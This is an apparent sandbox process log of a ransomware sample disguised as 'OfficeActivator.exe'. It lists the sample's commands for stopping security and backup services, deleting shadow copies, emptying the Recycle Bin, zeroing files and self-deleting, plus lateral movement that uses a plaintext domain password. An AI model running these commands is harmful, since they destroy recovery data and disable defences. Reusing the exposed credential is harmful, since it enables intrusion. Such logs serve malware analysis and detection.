"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6148 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\net.exe

"net.exe" stop avpsus /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop mfewc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BMR Boot Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop NetBackup BMR MTFTP Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop DefWatch /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccEvtMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccSetMgr /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\net.exe

"net.exe" stop SavRoam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop RTVscan /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBFCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBIDPService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBCFMonitorService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooBackup /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooIT /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop zhudongfangyu /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop stc_raw_agent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VSNAPVSS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop veeam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop PDVFSService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecManagementService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecRPCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcrSch2Svc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcronisAgent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop sophos /y

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\net.exe

"net.exe" use \\10.127.1.41 /USER:SHJPOLICE\amer !Omar2012

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe

"C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe" \10.127.1.41 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\Desktop\OfficeActivator.exe

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\arp.exe

"arp" -a

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

C:\Windows\SYSTEM32\net.exe

"net.exe" stop avpsus /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop mfewc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BMR Boot Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop NetBackup BMR MTFTP Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop DefWatch /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccEvtMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccSetMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop SavRoam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop RTVscan /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBFCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBIDPService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBCFMonitorService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooBackup /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooIT /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop zhudongfangyu /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop stc_raw_agent /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VSNAPVSS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop veeam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop PDVFSService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecManagementService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecRPCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcrSch2Svc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcronisAgent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop sophos /y

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

C:\Windows\SYSTEM32\net.exe

"net.exe" use \\10.127.1.41 /USER:SHJPOLICE\amer !Omar2012

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\net.exe

"net.exe" stop avpsus /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop mfewc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BMR Boot Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop NetBackup BMR MTFTP Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop DefWatch /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccEvtMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccSetMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop SavRoam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop RTVscan /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBFCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBIDPService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBCFMonitorService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooBackup /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooIT /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop zhudongfangyu /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop stc_raw_agent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VSNAPVSS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop veeam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop PDVFSService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecManagementService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecRPCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcrSch2Svc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcronisAgent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop sophos /y

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

